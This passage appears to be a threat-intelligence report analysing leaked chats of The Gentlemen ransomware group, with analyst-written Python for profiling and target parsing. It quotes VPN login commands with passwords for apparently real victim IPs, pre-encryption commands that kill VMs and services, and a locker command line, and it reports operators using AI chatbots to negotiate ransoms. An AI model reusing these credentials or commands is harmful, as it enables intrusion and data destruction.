Ransom-ISAC Technical Intelligence Report
Reading Time: 120 Minutes
Tags: TheGentlemen, RaaS, Ransomware, LeakAnalysis, Fortinet
Report Type: Intelligence Whitepaper
Contributors: Alexandre Dulaunoy, Chaitanya H., Dani [Varys] K, Ellis Stannard, Eric Taylor, Jeffrey Bell, Katya K, Nick Smart, Olivier Ferrand, Pedro Moura, Rakesh Krishnan, Vlad G, Valéry Rieß-Marchive
Analysis tools and data are maintained in a private GitHub repository managed by the RansomLook team.

Analysis graph — Obsidian vault showing room-to-actor relationships
Executive Summary
In early May 2026, the internal communications infrastructure of The Gentlemen ransomware group was compromised and their data leaked publicly. A user operating under the handle “n345” first offered the data for sale on May 5, 2026 at a price of $10,000 USD in Bitcoin, providing a Tox ID for contact. Three days later, on May 8, the same user released the data freely on multiple forums including PwnForums and CryptBB.
The leaked archive contains 22 Rocket.Chat room exports (CSV format), hundreds of screenshots, and operational files from the group's internal communications platform hosted at xcsqtdobtmdhsjkyjz6iydfowh7bps5dd3a2xg53oirylnohednc4syd.onion. The data spans from November 2025 through late April 2026 and provides an unusually detailed view into the group's structure, tooling, victim targeting pipeline, negotiation tactics, and affiliate relationships.
The compromise traces back to an attack on hosting provider 4VPS.SU, which on May 2, 2026 disclosed that its website and client billing system had been breached. Attackers executed a proxy server swap that briefly redirected the 4VPS domain to a phishing address and planted a fake message claiming full infrastructure destruction. According to 4VPS, the main hosting infrastructure sustained no physical damage and client data remains intact, though the billing system required restoration and some servers were rendered unavailable — either through emergency network isolation or GRUB bootloader damage. The Gentlemen group has publicly confirmed that part of their own backend infrastructure was compromised as a result of this 4VPS breach, though they claim core components (control panel, blog, lockers) were unaffected.
The Russian-speaking RaaS operation emerged in July/August 2025, with its first public data leak site (DLS) post on September 9, 2025. RansomLook records now attribute more than 400 publicly claimed victims to the group. This report analyses a leaked Rocket.Chat corpus covering only November 2025 through late April 2026 — approximately 6 months of a 10+ month operation — from which 66 victims are independently confirmed across the 22 exported chat rooms. This represents roughly 16% of the known victim pool, making this report a window into a much larger operation rather than a comprehensive teardown. The group's full victim list — maintained internally and referenced in the PODBOR targeting channel — is significantly larger than what this partial leak exposes. High-profile targets include an Iraqi commercial bank, a Mauritian financial services group, a Gulf cement manufacturer, a Spanish ceramics manufacturer, and an Asian investment firm where the group claimed to have stolen 1.5 TB of data. Analysis by the Ransom-ISAC team and collaborators — including Alexandre Dulaunoy and Olivier Ferrand of RansomLook — reveals the full operational lifecycle of a significant RaaS operation with victim impact across multiple continents.
1. Leak Origin and Timeline
1.1 Pre-leak operational timeline (Nov 2025 – 4 May 2026)
The operational timeline reveals a rapid professionalization of The Gentlemen's activities from November 2025 through early May 2026. After migrating from Mattermost to a self-hosted Rocket.Chat instance on Tor in mid-November, the group quickly scaled their operations: moving from opportunistic FortiGate VPN exploitation to a structured phishing pipeline and deploying specialized C2 tooling like ZeroPulse and Velociraptor by January. High-impact live intrusions, including attacks on a major telecom provider and international shipping companies, dominate the early 2026 timeline. Concurrently, operators actively integrated AI models to assist with decryption, data analysis, and negotiation workflows. The operation maintained this high tempo until a backend infrastructure compromise forced a public acknowledgment on May 4, followed by the complete public leak of their operational archives on May 8.
```mermaid
timeline
    title The Gentlemen — Major Operational Milestones (Jul 2025 – May 2026)
    Jul–Aug 2025 : Group emerges
    Sep 2025 : First public DLS post (9 Sep)
    Oct 2025 : Early operations (pre-corpus)
    Nov 2025 : Rocket.Chat corpus begins
             : Mattermost → Rocket.Chat migration
             : First FortiGate targets
             : First confirmed victim (in corpus)
    Dec 2025 : HTML phishing pipeline
             : First targets delivered
    Jan 2026 : ZeroPulse C2 & Ops panel
             : Velociraptor introduced
             : Major telecom intrusion
    Feb 2026 : NAS ransomware deployments
             : AI models shared
    Mar 2026 : Target list sharing
             : Enterprise & shipping intrusions
    Apr 2026 : Uncensored AI shared (Qwen)
             : GPU rented for data analysis
    May 2026 : Infrastructure compromise confirmed
             : Data leaked publicly
```

| Date | Event |
|---|---|
| May 5, 2026 | User “n345” posts “The Gentlemen - hacked data for sale” on PwnForums. Price: 10K USD in BTC. Tox ID provided for samples. Account created May 2026, 2 posts, 0 reputation. |
| May 8, 2026 | Same user posts “The Gentlemen - leaked data” on CryptBB with a Mediafire download link. Data released freely. |
| May 9, 2026 | CTI community begins collaborative analysis. Data surfaces in threat intelligence channels. |
| May 10, 2026 | Ransom-ISAC team analysis underway. RansomLook publishes processed data to private GitHub repository. |

PwnForums sale post — “The Gentlemen - hacked data for sale” by n345, $10K USD

CryptBB free release — “The Gentlemen - leaked data” by n345, May 8 2026

Leaked data folder structure — 22 room directories plus 8990.zip
Leak Tox ID (from sale post): 7862AE03A73AAC2994A61DF1F635347F2D1731A77CACC155594C6B681D201F7AD6817AD3AB0A
Note: This Tox ID does not match the Tox ID found in the group's own ransom note drafts (F8E24C7F5B12CD69C44C73F438F65E9BF560ADF35EBBDF92CF9A9B84079F8F04060FF98D098E), suggesting the leaker is not a current group member using the same comms channel — or is using a separate identity.

Official response post by The Gentlemen — T1erone forum, 4 May 2026
In response to the leak, The Gentlemen posted an official statement on T1erone on May 4, 2026 — notably one day before the data was offered for sale publicly by “n345” on May 5. This timing suggests they either had advance warning/intelligence on the leaker, or the leaker contacted them prior to going public.
The group confirmed the Rocket.Chat compromise, attributing it to the hacking of their hosting provider 4VPS, stating that 4VPS “brazenly lied that everything was fine.” They acknowledged the leaked Rocket password is genuine but claimed the attacker never gained access to the control panel, blog, lockers, or other critical components. Dismissing the breach with the Russian proverb “the dogs bark, but the caravan moves on,” they immediately pivoted to announcing operational upgrades: a new communications structure, new NAS infrastructure “available on Victory Day,” and locker improvements including hardware breakpoint removal, NTDLL unhooking, and ETW patching. The group characterized the leak as “indeed very partial — which is actually sad,” framing it as a disappointment rather than a threat. The response read less like damage control and more like a press release — business as usual for a group that sees itself as a professional operation.
Key statements from The Gentlemen's response:
- Confirmed “part of Rocket was compromised” and the leaked password is correct
- Claimed “no access to the control panel, blog, lockers, or other critical components”
- Blamed 4VPS: “they brazenly lied that everything was fine, and nothing happened”
- Stated the attacker “spent a month attempting to extract data from NASA through an onion blog” and they mistook the requests for automated bots
- Announced operational continuity: new communications structure, new NAS “available on Victory Day” (May 9)
- Listed locker improvements: hardware breakpoint removal from DR registers, NTDLL unhooking with clean syscall stubs, ETW patching
- Claimed: “A locker has been successfully running under active EDR from a well-known vendor”
- Dismissed the situation: “the dogs bark, but the caravan moves on”
Pre-leak internal security concerns (insider threat + blackmail): The corpus also contains earlier messages implying (1) prior internal compromise events and (2) a separate extortion/blackmail episode before the May 2026 public leak.
2026-02-02 — zeta88:
“Если крысы опять будут на борту - сменим тор - и всё)
удалим крысу. бд останется”
Translation: “If the rats are on board again — we change Tor and that's it. Delete the rat. The DB stays.”
Note: “Опять” (“again”) implies an earlier insider incident prior to May 2026.
2026-02-28 — zeta88:
“была атака на нас, и был атакован атакующий (блекмейл)
и была удалена статья в ресерчерском издании”
Translation: “There was an attack on us, and the attacker was attacked [blackmailed], and a researcher article was deleted.”
Note: zeta88 indicates a pre-leak incident involving mutual blackmail and the apparent removal of a research publication.
2. Group Structure and Affiliates
2.1 Corpus coverage and room distribution
Total sample: 3,366 unique messages across 22 rooms (by message ID).
- 3,093 with text content
- 273 image-only (attachment only, no text)

Rocket.Chat room volume distribution — 3,366 unique messages across 22 rooms (by message ID)
| Room | Messages | Description / context |
|---|---|---|
| 302930 | 782 | Main ops/strategy room (zeta88 + qbit) |
| 133148 | 527 | Negotiation room |
| 939364 | 455 | Kunder/zeta88 DM — payment + G-BOT delivery |
| 724140 | 439 | zeta88 + quant — hardware, G-BOT panel, Victim operation |
| 843543 | 355 | Victim operation |
| 505812 | 324 | Protagor/quant/zeta88 — NAS browsing + phishing |
| Other rooms (16 rooms) | 873 | All remaining rooms combined |
Smallest rooms: 791070, 217109, 945300, 462726 each have 3–5 messages — primarily credential drops with little/no conversation.
2.2 Core Members
The corpus contains 9 distinct Rocket.Chat usernames across the 22 exported rooms. Message volume and room presence indicate a clear hierarchy.
| Username | Messages | Rooms (of 22) | Assessed Role |
|---|---|---|---|
| zeta88 | 1,891 | 18 | Admin / operator lead. Posts target intake, tooling, VPN configs, ransom note drafts, and strategic decisions. Present in nearly all rooms. |
| Protagor | 430 | 12 | Active affiliate / pentester. Executes intrusions, runs brute-force, explores victim networks. |
| Wick | 405 | 7 | Affiliate / pentester. Handles Fortinet access, SMB relay, locker deployment. Exchanges Islamic greetings with mAst3r on 2025-12-03 (mAst3r: “салам”, Wick: “алейкум”), suggesting a Muslim background consistent with Russia or Central Asia. |
| qbit | 320 | 4 | Strategic partner to zeta88. Discusses RaaS program selection, posts Fortinet target lists, shares CVE exploits. |
| mAst3r | 285 | 3 | Affiliate. Works with Wick on intrusions. Confirms ransomware deployment (“README-GENTLEMEN.txt есть”). |
| quant | 217 | 5 | Credential checker / phishing operator. Processes stolen OWA credentials, identifies bank targets from breached email. |
| Kunder | 182 | 5 | Affiliate / G-BOT developer. Handles Fortinet exploitation, payment processing, target handoffs. Also responsible for G-BOT C2 development and delivery (room 939364). |
| JeLLy | 2 | 2 | Tooling contributor. Provides XenAllPasswords with external DLL. |
| Bl0ck | 1 | 1 | Minimal presence. Single message. |

Message volume by core member (pie chart)
Team dynamics and revenue framing (selected quotes)

Internal chat excerpt — team dynamics and revenue-based target framing
The leak includes direct evidence of revenue-based target framing and suggests at least one affiliate (Kunder) has a subordinate operator team.
Revenue context — Turkish home-appliance manufacturer (April 2026):
2026-04-12 — zeta88:
“я щас опять ебу по дате лярдник. 12 лярдов. бытовая техника. бренд ты знаешь”
Translation: “I'm chasing a deadline again. 12 billion. Home appliances. You know the brand.”
Note: “лярдник” = billion-ruble target. 12B RUB ≈ ~$130M USD. A separate “9 лярдов” target is mentioned on Apr 15.
Kunder appears to manage a sub-team (February 2026):
2026-02-07 — Kunder:
“мои там все грезят доступами, что-то дорабатывают) уже боты были, но пивотинга нет, только цмд, от юзера”
Translation: “My people are dreaming of accesses, working on improvements. Already had bots but no pivoting, only cmd, user-level.”
Note: Implies Kunder has operators working under them (tooling/bot development) beneath zeta88's overall leadership.
2.3 Communications Platform Timeline
The leaked data is entirely from the group's self-hosted Rocket.Chat instance on Tor (xcsqtdobtmdhsjkyjz6iydfowh7bps5dd3a2xg53oirylnohednc4syd.onion), used November 2025 through April 2026. They migrated there from Mattermost in mid-November 2025. Matrix references visible in some screenshots (matrix.bestflowers247.online, timestamped 2023) are old bilateral comms shared as image attachments inside Rocket.Chat for reference — not a concurrent platform.
| Period | Platform | Evidence |
|---|---|---|
| Pre-Nov 2025 | Mattermost | 2025-11-12 — zeta88: “маттермост - жуть” (“Mattermost is awful”) / “давайте закрываем там всё и сюда едем” (“let's close everything there and come here”) |
| Nov 2025 → Apr 2026 | Rocket.Chat on Tor (leaked corpus) | Entire leaked dataset. Jan 2026: zeta88 references “старый рокет” (old Rocket) still alive with newcomers — confirming two parallel Rocket instances briefly coexisted. zeta88 wants to “старый рокет закрыть” (close the old Rocket). |
| Planned post-Apr 2026 | Rust-based chat (planned) | Apr 2026: “рокету скоро пизда. поедем в другой чат на расте” (“Rocket is going to shit, moving to a Rust chat”). Apr 30 — last message: “рокет удалять буду” (“I'm going to delete Rocket”). |
| 2023 (historical) | Matrix (matrix.bestflowers247.online) | Screenshots of old bilateral comms from 2023, shared as image attachments inside Rocket.Chat. Not a concurrent platform during the Nov 2025–Apr 2026 period. |
2.4 Communication Language and Working Hours
All internal communications are in Russian. The group uses ZoomInfo for victim revenue research, Reverso.net for English translation (visible in browser tabs and screenshots), and AI assistants (explicitly referenced: “Гпт. клауде — мы играем в переговорщика” — “GPT. Claude — we're playing negotiator. It will help you”).
2.5 Rocket.Chat User ID Mapping
Rocket.Chat constructs DM room IDs as the alphabetical concatenation of two 17-character user IDs. Analysis of 9 distinct DM room IDs yields 8 unique user IDs, with the following confirmed mappings:
- gZ8Fsa7xdDghbFHDK → zeta88 (present in 6 of 9 DM IDs; consistent with highest room presence)
- WF4u5fzhWChuxBRZ2 → qbit (paired exclusively with zeta88 in room 302930, which contains only these two participants)
Note: The DM ID 3rKqsqFP7JfjBhe9igZ8Fsa7xdDghbFHDK superficially resembles a Bitcoin P2SH address, but all 7 corpus occurrences are Rocket.Chat /direct/<id> URLs — it is a room ID, not a wallet.
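The mapping above can be reproduced mechanically. The following is an added example (not tooling from the report or the group): it splits 34-character DM room IDs into their two sorted 17-character user IDs, counts each user's DM presence, and applies a Base58Check test to show why the room ID quoted in the note is not a Bitcoin address. The room ID and the two user IDs named in this section are taken from the report; every other user ID is a constructed placeholder.

```python
"""Derive Rocket.Chat user ids from DM room ids and rank users by DM presence.

Rocket.Chat forms a DM room id by sorting the two participants' 17-character
user ids and concatenating them, so every DM room id exposes both user ids even
when the export contains no user table.
"""
import hashlib
from collections import Counter
from typing import List, Optional, Tuple

USER_ID_LEN = 17
DM_ID_LEN = 2 * USER_ID_LEN
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Quoted in the report:
ZETA88 = "gZ8Fsa7xdDghbFHDK"
QBIT = "WF4u5fzhWChuxBRZ2"
REPORTED_DM_ID = "3rKqsqFP7JfjBhe9igZ8Fsa7xdDghbFHDK"
# Constructed placeholders for this example, not values from the leak:
CONSTRUCTED_UIDS = ["Ab12cd34ef56gh78X", "Zz99yy88xx77ww66Q", "mNoPqRsTuVwXyZ123",
                    "Qq11Ww22Ee33Rr44T", "Hh55Jj66Kk77Ll88U"]


def dm_room_id(uid_a: str, uid_b: str) -> str:
    """Rebuild a DM room id the way Rocket.Chat does: sort the two ids, then join."""
    if len(uid_a) != USER_ID_LEN or len(uid_b) != USER_ID_LEN or uid_a == uid_b:
        raise ValueError("need two distinct 17-character user ids")
    return "".join(sorted((uid_a, uid_b)))


def split_dm_room_id(rid: str) -> Optional[Tuple[str, str]]:
    """Return the two user ids, or None if rid cannot be a Rocket.Chat DM room id."""
    if len(rid) != DM_ID_LEN or not rid.isalnum():
        return None
    a, b = rid[:USER_ID_LEN], rid[USER_ID_LEN:]
    # The halves are sorted before joining, so an unsorted pair is not a DM id.
    return (a, b) if a < b else None


def user_presence(dm_ids: List[str]) -> Counter:
    """Count the number of DM rooms each derived user id takes part in."""
    counts: Counter = Counter()
    for rid in dm_ids:
        parts = split_dm_room_id(rid)
        if parts:
            counts.update(parts)
    return counts


def most_present(dm_ids: List[str]) -> Tuple[str, int]:
    """The user id seen in the most DM rooms (the admin candidate) and its count."""
    return user_presence(dm_ids).most_common(1)[0]


def passes_base58check(s: str) -> bool:
    """True only if s is a valid Base58Check string, as a real P2SH address would be."""
    if not s or any(c not in B58 for c in s):
        return False
    n = 0
    for c in s:
        n = n * 58 + B58.index(c)
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    raw = b"\x00" * (len(s) - len(s.lstrip("1"))) + raw  # leading '1's are zero bytes
    if len(raw) < 5:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def sample_dm_ids() -> List[str]:
    """Nine DM room ids: the reported one plus constructed pairings, shaped so that
    zeta88 is in 6 of 9 rooms and qbit only pairs with zeta88, as in the report."""
    third = REPORTED_DM_ID[:USER_ID_LEN]  # the other participant of the reported DM
    c1, c2, c3, c4, c5 = CONSTRUCTED_UIDS
    pairs = [(ZETA88, QBIT), (ZETA88, third), (ZETA88, c1), (ZETA88, c2),
             (ZETA88, c3), (ZETA88, c4), (c1, c2), (c3, c5), (c4, c5)]
    return [dm_room_id(a, b) for a, b in pairs]


if __name__ == "__main__":
    ids = sample_dm_ids()
    print(f"{len(ids)} DM rooms -> {len(user_presence(ids))} unique user ids")
    print("most present:", most_present(ids))
    print("reported id passes Base58Check:", passes_base58check(REPORTED_DM_ID))
```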
2.6 Room Structure
The exported rooms represent DM pairs and small group discussions. Notably, several operational channels referenced in chat messages were NOT included in the export:
Missing channels (referenced but not dumped):
- /channel/PODBOR (target selection — 10 references)
- /channel/INFO (knowledge base)
- /channel/general
- /channel/TOOLS
- /group/PHISHING (21 references from room 505812 alone)
- 10 additional groups related to specific victims
This means the leak is partial — the actual operational data is significantly larger than what was exported.
Coverage context: The group has been active since at least July/August 2025 (first DLS post: September 9, 2025) and RansomLook attributes 400+ publicly claimed victims to the operation. The 22 exported rooms and 66 confirmed victims from this corpus represent approximately 16% of the known victim pool, covering only ~6 months of a 10+ month operation. All quantitative findings in this report should be treated as lower bounds.
2.7 Temporal Analysis
The group operates on a roughly 11-hour core window from UTC 10:00 through UTC 21:00, with peak traffic at UTC 17:00 (512 messages). A secondary spike at UTC 00:00–01:00 (370 messages combined) is driven primarily by quant and zeta88. The sustained trough runs from UTC 02:00 to 09:00, functioning as the group's collective downtime. There is no meaningful weekend reduction in activity — Sunday is the busiest day (668 messages) and Friday the quietest (372), suggesting the group doesn't operate on a conventional work-week rhythm.
Monthly volume shows a sharp ramp from low-level activity in November–December 2025 (38 and 31 messages respectively) to a January 2026 surge of 1,176 messages. Volume dips in February (754), recovers in March (1,096), then tapers again in April (638). The January spike likely marks an operational inflection point — either new members joining, a campaign launch, or both.
Of the seven operators, four share a broadly similar active window clustered around the UTC 10–21 band: zeta88 (peak UTC 17, active 10–01), Protagor (peak UTC 17, active 06–22), Wick (peak UTC 18, active 11–22), and Kunder (peak UTC 17, active 09–21). mAst3r fits a similar but slightly shifted profile (peak UTC 16–18, active 06–21). The two outliers are quant, whose activity concentrates in UTC 00–11 with a peak at UTC 00 and near-total silence after UTC 12, and qbit, who shows a bimodal pattern — two distinct sessions split by a UTC 05–08 gap.

2.7.1 Assessment
The top five operators (zeta88 through mAst3r) share a remarkably consistent shape — activity concentrated in the UTC 10–21 band, peaking between UTC 16–18, with near-silence in the early UTC hours. That clustering suggests they're coordinating around a shared operational window, whether because they're in similar timezones or because the group's workflow demands overlapping availability.
Quant is the clearest outlier. Activity is essentially inverted — peaking at UTC 00–01 and tapering off by UTC 11–12, with a near-total blackout from UTC 12 through 23. That's not a night-owl variant of the core pattern; it's a fundamentally different daily cycle. Whatever is driving it — timezone, work schedule, personal preference — quant is operating on a clock that has almost zero overlap with the group's peak hours. Quant's contribution to the UTC 00–01 secondary spike is what makes it visible at all.
Qbit shows a different kind of anomaly: two distinct sessions separated by a hard zero-message gap at UTC 05–08. The first session (UTC 00–04) overlaps with quant's active window. The second (UTC 09–18) overlaps with the core group. That bimodal split is structurally unusual — most people show a single continuous active block with gradual tails. Two cleanly separated sessions suggest either a split schedule, a timezone where those windows map to morning and evening, or a deliberate operational choice to be present during both the core group's hours and quant's hours.
Quant's active window of UTC 00–11 maps cleanly to a standard waking/working day somewhere in the UTC+5 to UTC+9 range. At UTC+7 that's 07:00–18:00 local, at UTC+8 it's 08:00–19:00, at UTC+6 it's 06:00–17:00. The sharp start at UTC 00 and clean cutoff around UTC 11–12 look like someone logging on in the morning and signing off at end of day. The pattern is too regular and too concentrated to be a night owl in a European timezone — a person choosing to work overnight would typically show more drift and less consistency. The data points toward Central, South, or Southeast Asia.
Qbit is harder to pin down because of the bimodal pattern. If you assume a single timezone, UTC+8 produces the neatest fit: session one (UTC 00–04) becomes 08:00–12:00 local, the gap (UTC 05–08) becomes a midday break at 13:00–16:00, and session two (UTC 09–18) becomes 17:00–02:00 local — a morning work block followed by an evening session. UTC+7 works almost as well. The alternative is that qbit is in a European timezone and deliberately maintaining two sessions to bridge the core group's hours and quant's hours, but that's a more complex explanation for the same data.
2.7.2 Timezone Assessment Table:
| Operator | UTC active window | Peak | Compatible offset range | Confidence | Key constraint |
|---|---|---|---|---|---|
| Protagor | 06:00–22:00 | 17:00 | UTC+2 to +4 | High | Self-confirmed MSK; multiple cross-references |
| Kunder | 09:00–21:00 | 17:00 | UTC+2 to +4 | High | Explicitly references MSK times in messages |
| zeta88 | 10:00–01:00 | 17:00 | UTC+2 to +4 | Moderate | Heavy MSK references; night-owl tail doesn't contradict |
| Wick | 11:00–22:00 | 18:00 | UTC+2 to +3 | Moderate | “Almost the same time as” South Africa (UTC+2); MSK scheduling |
| mAst3r | 06:00–21:00 | 16:00–18:00 | UTC+7 to +8 | High | “два часа ночи” at UTC 18:45 — arithmetic rules out MSK |
| quant | 00:00–11:00 | 00:00 | UTC+5 to +9 | Moderate | Clean daytime pattern in that range; incompatible with European Russia |
| qbit | 00–04 + 09–18 | 13:00 | UTC+8 to +10 | Low | Bimodal fits morning/evening split; wide geographic possibilities |
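The per-operator profiles in this section rest on hour-of-day histograms. The added example below (not from the report) builds those histograms from export rows, isolates each operator's core hours, finds contiguous sessions that may wrap past midnight, and lists the UTC offsets under which the core hours fall inside an assumed 05:00–21:00 local waking day. The CSV columns and the rows, shaped after quant's daytime pattern and qbit's bimodal pattern, are constructed; the report's final offset calls also draw on message content (MSK references), which this code does not see.

```python
"""Operator activity profiles from a chat export: UTC-hour histograms, core
hours, circular sessions, and histogram-compatible UTC offsets.
"""
import csv
import io
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

LOCAL_DAY = (5, 21)  # assumed local waking window: hours 05:00 through 20:59


def constructed_export() -> str:
    """Constructed rows (not leak data) in an assumed ts,username,msg layout.
    Spec tuples: username, hour range [start, end), messages per hour."""
    spec = [
        ("quant", 0, 1, 12), ("quant", 1, 12, 8), ("quant", 12, 13, 1),   # daytime UTC 00-11
        ("qbit", 0, 5, 6), ("qbit", 9, 13, 6), ("qbit", 13, 14, 9),        # two sessions,
        ("qbit", 14, 19, 6), ("qbit", 19, 20, 1),                          # gap at UTC 05-08
    ]
    out = io.StringIO()
    writer = csv.writer(out)
    writer.writerow(["ts", "username", "msg"])
    for user, start, end, per_hour in spec:
        for hour in range(start, end):
            for minute in range(per_hour):
                writer.writerow([f"2026-01-14T{hour:02d}:{minute:02d}:00Z", user, "..."])
    return out.getvalue()


def hour_histogram(csv_text: str) -> Dict[str, List[int]]:
    """Messages per user per UTC hour (24 bins); timestamps are taken as UTC."""
    hist: Dict[str, List[int]] = defaultdict(lambda: [0] * 24)
    for row in csv.DictReader(io.StringIO(csv_text)):
        ts = datetime.strptime(row["ts"], "%Y-%m-%dT%H:%M:%SZ")
        hist[row["username"]][ts.hour] += 1
    return dict(hist)


def core_hours(counts: List[int], frac: float = 0.25) -> Set[int]:
    """Hours carrying at least `frac` of the peak hour's volume; stray messages drop out."""
    peak = max(counts)
    return {h for h, c in enumerate(counts) if peak and c >= frac * peak}


def sessions(hours: Set[int]) -> List[Tuple[int, int]]:
    """Contiguous runs on the 24-hour circle as (start_hour, length), longest first.
    A run crossing midnight (e.g. 22-01) is reported once, from its true start."""
    if len(hours) == 24:
        return [(0, 24)]
    runs = []
    for start in range(24):
        if start in hours and (start - 1) % 24 not in hours:
            length = 0
            while (start + length) % 24 in hours:
                length += 1
            runs.append((start, length))
    return sorted(runs, key=lambda r: (-r[1], r[0]))


def compatible_offsets(hours: Set[int], local_day: Tuple[int, int] = LOCAL_DAY) -> List[int]:
    """UTC offsets (-12..+14) that place every given hour inside the local waking window."""
    lo, hi = local_day
    return [off for off in range(-12, 15)
            if hours and all(lo <= (h + off) % 24 < hi for h in hours)]


def assess(counts: List[int]) -> Dict[str, object]:
    """Peak, sessions, and offsets for all core hours and per session; a bimodal
    operator can have no single offset that explains both sessions."""
    core = core_hours(counts)
    runs = sessions(core)
    per_session = [compatible_offsets({(s + i) % 24 for i in range(n)}) for s, n in runs]
    common = sorted(set(per_session[0]).intersection(*per_session[1:])) if per_session else []
    return {"peak": counts.index(max(counts)), "sessions": runs,
            "offsets_all_hours": compatible_offsets(core),
            "offsets_per_session": per_session, "offsets_common": common}


if __name__ == "__main__":
    for user, counts in hour_histogram(constructed_export()).items():
        print(user, assess(counts))
```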
3. Operations and TTPs
3.1 Attack Chain Overview
The leaked communications reveal a consistent attack chain:
TTPs / tooling — explicit mentions
The table below summarizes selected tools explicitly named in the 22 exported room CSVs. Counts include Russian-language mentions (e.g. форти, рдп) alongside English tool names and may vary with additional parsing or OCR of screenshots.
| Tool | Count | Breakdown | Use |
|---|---|---|---|
| FortiGate / Fortinet | 81 | fortigate: 32, fortinet: 16, форти: 33 | Initial access (SSL VPN exposure and credentialed access) |
| nxc / NetExec (CrackMapExec successor) | 32 | nxc: 30, netexec: 2 | SMB/AD enumeration, credential validation, lateral movement |
| RDP (all forms) | 24 | rdp: 10, xfreerdp: 7, freerdp: 7 | Lateral movement / interactive access / persistence |
| psexec / wmic / wmi | 15 | psexec: 5, wmic: 1, wmi: 9 | Lateral movement / remote execution |
| Velociraptor | 14 | — | Repurposed DFIR tool as C2 (v0.76, multi-org configs) |
| openconnect | 10 | — | Fortinet VPN client (--protocol=fortinet) for initial access |
| Amnezia VPN | 5 | — | Operator OPSEC |
| rclone | 4 | — | Exfiltration (cloud transfer tooling) |
| mimikatz | 3 | — | Credential dumping |
| chisel | 2 | — | Tunneling / pivoting |
| BloodHound | 2 | — | AD attack-path mapping |
| Tor Browser | — | — | Operator OPSEC |
| api.c99.nl | (screenshot) | — | Subdomain enumeration / victim infrastructure footprinting |
| FreeRDP 18.0.12 | (screenshot) | — | Linux/cross-platform RDP client (included in RDP count above) |

TTPs / tooling — explicit CSV mentions incl. Russian-language variants (pie chart — updated counts)
1. Target Selection (PODBOR channel)
Targets are identified through Fortinet device scanning. Listings are posted in a structured format containing IP, port, FortiGate model, firmware version, hostname, and country. Victims are then researched on ZoomInfo for revenue and sector. Example target intake format from zeta88:
2022 SingaporeSingapore 119.73.149.194:443 [REDACTED] https://www.zoominfo.com/c/[REDACTED]/ Сектор - софт. Ревеню - 5кк
2. Initial Access via Fortinet VPN
The string openconnect --protocol=fortinet appears in 10 messages across the corpus. VPN passwords used by the group follow a naming convention: gentlemen25, Gentlemen25, gentle26.
Verbatim examples:
```
openconnect --protocol=fortinet --no-dtls -u root 14.99.248.6:10443/ password:gentlemen25
openconnect --protocol=fortinet --no-dtls -u root 102.212.53.2:10443/ password:gentle26
```
FortiGate configuration dumps containing plaintext local user passwords and LDAP bind credentials are shared in full between affiliates.
3. Internal Reconnaissance
- NetExec (nxc) for SMB enumeration — 32 occurrences in CSV corpus (nxc: 30, netexec: 2)

SMB Enumeration using nxc
- Custom scanner (“gogo”) for web service discovery
- Shodan and Censys for external asset discovery
- Snusbase for credential lookup against victim domains

Snusbase for credential lookup against victim domains
- api.c99.nl — subdomain enumeration API used for footprinting victim public infrastructure (observed in operator screenshot showing the C99.NL CLI tool with ping results and JSON-formatted response data)

4. Credential Harvesting and Lateral Movement
- Password spraying against domain controllers
- LDAP enumeration using extracted FortiGate bind credentials
- NTLM relay attacks (ntlmrelayx, Responder)
- Credential dumping (KslKatz, KslDump, patched Mimikatz for Windows 11 24H2/25H2)
- Browser secret extraction (DumpBrowserSecrets)
- Stealer log processing (zeta88 claims “3 TB of ULP and a scraper for them”)
5. Persistence and C2
- G-BOT Control Panel — custom C2 with web UI, beacon management, SOCKS5 proxy integration, and a builder that uploads payloads to temp.sh/0x0.st
- Velociraptor — the legitimate DFIR tool repurposed as C2, with multi-org configurations and MSI package building
- ZeroPulse — referenced C2 framework (github.com/jxroot/ZeroPulse)
6. Data Exfiltration
- rclone, RcloneView, WinSCP for cloud/remote transfers
- Various cloud mount tools evaluated (RaiDrive, NetDrive, AirLiveDrive, MountainDuck, CyberDuck)
- Limewire used for internal file sharing between affiliates
- Unknown aaa.exe file consistent with a file-scanning/exfiltration utility, observed with the flags --max-age 5y (files up to 5 years old), --max-size 100 (likely MB), --min-size 1 (skip tiny files), --bwlimit 3M (bandwidth throttling to avoid detection), --scan-rate 200, and --transfers 8 (parallel transfers). It is targeting the entire C:\ drive.

aaa.exe - possible exfiltration tool
7. Pre-Encryption Actions
Pre-encryption scripts observed in the corpus:
```
docker stop $(docker ps -q)
pkill -9 qemu
sudo pkill -9 -f "qemu-system"
sudo systemctl stop $(systemctl list-units --type=service | grep -iE 'mysql|maria...')
```
8. Encryption
- Linux/NAS locker binary: /opt/updateamd with flags --password W8wNZteb --path "/volume1/DATA/HQ Common Share" --ultrafast --keep
- Encrypted file extension: .i8p14s
- Ransom note filename: README-GENTLEMEN.txt (also README-GENTLEMEN without extension)

Encryption process from payload locker - linux variant.
9. Negotiation
Negotiations conducted via qTox. Initial pricing tiers (per operator messaging):
- Decryption: $65–80K
- Data removal (blog, server, social media): $95–120K
- Security report: $25K
- Opening “all options” package: $100–225K
Note: Actual negotiated demands diverge from these opening tiers — the full negotiation transcript in Section 7 shows the final demand stabilising at $190K after multiple rounds. Treat the figures above as the group's formulaic starting position, not as fixed pricing.
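The PODBOR intake format from step 1 above is regular enough to parse. The following is an added example (not from the report or the group's tooling) that turns intake lines into structured records, normalises the Russian revenue shorthand seen in the corpus (“5кк”, “12 лярдов”), and matches listed target IPs against constituent netblocks so that an ISAC can warn a member before the intrusion progresses. The intake lines (TEST-NET addresses, placeholder ZoomInfo paths) and the netblocks are constructed.

```python
"""Parse PODBOR-style target intake lines, normalise revenue shorthand, and match
target IPs against constituent netblocks for victim notification.
"""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

# Constructed intake lines in the report's format (not values from the leak).
SAMPLE_INTAKE = """\
2022 SingaporeSingapore 198.51.100.7:443 [REDACTED] https://www.zoominfo.com/c/example-co/0000000 Сектор - софт. Ревеню - 5кк
2023 Turkey 203.0.113.45:10443 [REDACTED] https://www.zoominfo.com/c/example-inc/0000001 Сектор - бытовая техника. Ревеню - 12 лярдов
"""
# Constructed member netblocks (e.g. an ISAC's constituents), not from the report.
MEMBER_NETS = {"member-a": ["198.51.100.0/24"], "member-b": ["192.0.2.0/24"]}

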